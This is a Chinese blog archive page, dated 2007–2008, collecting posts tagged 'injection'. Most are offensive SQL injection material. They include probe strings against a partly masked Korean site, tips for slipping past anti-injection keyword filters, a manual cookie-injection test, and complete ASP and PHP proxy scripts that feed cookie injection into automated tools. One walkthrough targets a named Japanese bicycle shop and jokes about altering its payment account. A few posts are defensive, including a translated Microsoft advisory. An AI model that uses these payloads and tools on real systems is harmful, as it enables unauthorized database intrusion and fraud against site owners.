存档

文章标签 ‘注入’

使用通用防注入的问题

2008年12月12日 没有评论

通用防注入一般都是包含中conn.asp文件内,或者单个文件内,加include,但是neeao版的在模块当中,定义了一个非常常用变量sql, 该变量在很多时候都会用到,所以会引起重定义错误,如:

Microsoft VBScript 编译器错误 错误 &#039;800a0411&#039; <br />名称重定义 <br />/Customers_New.asp,行 58 <br />dim rs,sql,tdCount,precent<br />-------^

快速解决方法就是,将通用防注入内的常见变量全部改掉,改成非常复杂的变量。

分类: 编程地带 标签:

搜索型注入

2008年6月12日 没有评论

来源:大胆
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。
然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。

我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁闷,看来要手工来暴需要的信息了。。。

http://www.*******.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号
阅读全文…

分类: 网络安全 标签:

MySQL Proxy(解决注入的另一思路)

2008年6月4日 没有评论

作者:云舒

What is MySQL Proxy?

MySQL Proxy is a simple program that sits between your client and MySQL server(s) that can monitor, analyze or transform their communication. Its flexibility allows for unlimited uses; common ones include: load balancing; failover; query analysis; query filtering and modification; and many more.

可以看到,MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。这样一种扩展,就给了我让他做别的事情的思路——防止注入攻击。 阅读全文…

分类: 网络安全 标签:

SQL注入攻击-来自微软安全博客的建议

2008年6月4日 没有评论

译者: 韩国峰 原文

简介
SQL注入攻击方式发展愈演愈烈,黑客通过SQL数据库对网站进行非法入侵并修改页面,同时页面上还会被加入恶意软件,持续影响一些网络应用程序。

本文翻译自微软博客上刊载的相关文章,英文原文版权归原作者所有,特此声明。 (特别感谢Neil Carpenter对本文写作提供的帮助)
近期趋势

从去年下半年开始,很多网站被损害,他们在用于生成动态网页的SQL数据库中存储的文本中被注入了恶意的HTML <script>标签。这样的攻击在2008年第一季度开始加速传播,并且持续影响有漏洞的Web程序。这些Web应用程序有这样一些共同点:

    * 使用经典ASP代码的程序
    * 使用SQL Server数据库的程序   阅读全文…

分类: 网络安全 标签:

注入限制绕过

2008年4月29日 没有评论

来源:%5c
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……

经过我的收集,大部分的防注入程序都过滤了以下关键字:

and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =

而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
对于关键字的过滤,以下是我收集的以及我个人的一些想法。

1、运用编码技术绕过 阅读全文…

分类: 网络安全 标签: , ,

Sql Injection脚本注入终极利用方法

2008年4月7日 没有评论

来源:纯色笔记

声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。   阅读全文…

分类: 网络安全 标签:

Cookie注入手工检测方法

2007年12月11日 没有评论

来源:精灵

http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie=”id=”+escape(“1 and 1=1”))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie=”id=”+escape(“188 and 1=2”))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。

分类: 网络安全 标签: ,

cookies注入加速工具-ASP版

2007年11月21日 没有评论

作者:zj1244
来源:职业欠钱&zj1244共用的public Blog

<br /><%<br />Str="xxxid="&escape(request("FK"))<br />Url="http://xxx.chinaxxx.com/injection.asp"<br />response.write PostData(Url,Str)<br /><br />Function PostData(PostUrl,PostCok) <br />Dim Http<br />Set Http = Server.CreateObject("msxml2.serverXMLHTTP")<br />With Http<br /><br />.Open "GET",PostUrl,False<br />.SetRequestHeader "Cookie",PostCok<br />.Send<br />PostData = .ResponseBody<br />End With<br />Set Http = Nothing<br />PostData =bytes2BSTR(PostData)<br />End Function<br /><br />Function bytes2BSTR(vIn)<br />Dim strReturn<br />Dim I, ThisCharCode, NextCharCode<br />strReturn = ""<br />For I = 1 To LenB(vIn)<br />ThisCharCode = AscB(MidB(vIn, I, 1))<br />If ThisCharCode < &H80 Then<br />strReturn = strReturn & Chr(ThisCharCode)<br />Else<br />NextCharCode = AscB(MidB(vIn, I + 1, 1))<br />strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))<br />I = I + 1<br />End If<br />Next<br />bytes2BSTR = strReturn<br />End Function<br /><br />%>

分类: 工具收集 标签: ,

PHP-cookies注入加速工具

2007年11月18日 没有评论

[codes=php]
/*
cookies 注入也加速 工具 PHP版
by 职业欠钱
最近遇到一个挂了防注入的东东,COOKIE注入可行,不过手工注入太辛苦了,便四处寻找加速工具
mika的工具依赖于SQL 错误开启的模式,而我遇到的这个是不显示错误信息的
只能够盲注了。
曾经找到一个ASP版的加速工具,其原理是将GET变量放到COOKIE里,然后调用XML去访问注入页面
将返回信息显示出来
这样的好处是可以用NBSI之类的常规注入工具进行检测
不过也许人品不好,我在用ASP版的加速工具的时候,什么也没返回
所以便有了这个简陋的PHP程序
*/

//使用方法:
//修改相关参数后,将本文件放到一个支持PHP的空间上
//把http://www.yousite.com/cookieinject.php?id=123
//填写到NBSI等注入工具中即可

error_reporting(7);
ini_set(“max_execution_time”,0);
$id=$_GET[“id”];
$id=str_replace(” “,”%20”,$id);
$id=str_replace(“=”,”%3D”,$id);
/*
articleId 换成注入页面的变量
例如 http://127.0.0.1/news.asp?articleId=123
注入变量就是articleId
*/
$inject=”articleId”;
//session是原来的COOKIE,可以自己抓包获取
$session =”ASPSESSIONIDSCBRDARD=AAGHANMCCHBPLDNPCIMFOLPI;”;
$cookie=$inject.”=”.$id.”;”.$session;
//echo $cookie;
//referer 是引用页地址,一般和目标网站相同
$referer=”http://127.0.0.1/”;
//url是注入页面的地址,注意这里不要再把注入变量写进去
$url=”http://127.0.0.1/news.asp”;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//这一句是为了把图片和iframe的相对地址改为绝对地址,根据需要可以注释掉
$content=str_replace(“src=\””,”src=\””.$referer,$content);
echo $content;
?>
[/codes]

分类: 工具收集 标签: ,

注射网站的详细步骤

2007年10月19日 没有评论

第一步关闭友好的HTTP提示-
在 internet选项——高级   里面

我们开始

这是我们的目标
http://www.cycly.co.jp/shop/detail.asp?id=1106
(这个是一个卖自行车的网站 请大家不要修改里面的汇款帐号否则被抓到本人不负责)

1
首先判断是不是注入点
http://www.cycly.co.jp/shop/detail.asp?id=1106 and 1=1

提示:varchar 抣 '1106 and 1=1'

说明是字符型,我们改一下语句 阅读全文…

分类: 网络安全 标签: